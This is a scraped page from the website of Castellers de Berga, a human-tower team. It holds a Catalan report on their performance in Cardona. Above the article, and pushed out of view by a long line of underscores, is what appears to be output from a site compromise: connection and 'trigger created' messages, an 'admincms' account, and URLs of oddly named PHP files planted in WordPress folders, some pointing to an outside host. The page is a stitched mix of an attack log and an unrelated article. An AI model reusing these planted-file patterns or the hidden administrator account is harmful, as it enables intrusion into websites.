Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?wp https://castellersdeberga.cat/wp-admin/includes/class-language-pack-upgrader-skin-wp-stream-private-meta.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/user/profile-stream-ajax-ajax-response-stream-private.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/network/plugin-install-private-ajax-response-core-ajax-wp-ajax-meta.php https://castellersdeberga.cat/wp-content/plugins/LayerSlider/layerslider-ajax-response-ajax-meta-ajax-ajax-wp-ajax-core-private.php https://castellersdeberga.cat/wp-content/plugins/the-events-calendar/the-events-calendar-ajax-response-core-core-wp.php https://castellersdeberga.cat/wp-includes/IXR/class-IXR-request-wp-ajax-private.php https://castellersdeberga.cat/wp-includes/link-template-private-cron-private-stream-meta-cron-private.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Actuació a Cardona
 

Actuació a Cardona


Actuació a CardonaAvui hem actuat a Cardona, a la Plaça de Bous. Era la segona vegada que hi actuàvem, ho vam fer ja el setembre de 2015. L’actuació està emmarcada en els actes de l’Associació Cultural 18 de setembre.
Les altres colles eren els Salats de Súria i els Castellers de Cerdanyola. A la Plaça de Bous, hi hem descarregat un primer pilar de 4 de dol, en record al Xavi Serra, que ens va deixar fa poc més d’un mes. Seguidament, hi hem descarregat un 4 de 6, 3 de 6, 2 de 6 i un altre pilar de 4 per tancar l’actuació. Una diada tranquil.la, esperant poder anar més enllà en les properes setmanes.
Per la seva banda, els Salats de Súria hi han descarregat el 2 de 6, com a castell més destacat, i els Castellers de Cerdanyola han signat una molt bona actuació descarregant, 3 de 7, 3 de 7 amb agulla, 4 de 7 i pilar de 5.
Els Castellers de Berga tornem a actuar la setmana vinent, diumenge 24 de setembre a la tarda, a Sitges, amb la Jove de Sitges i Xicots de Vilafranca.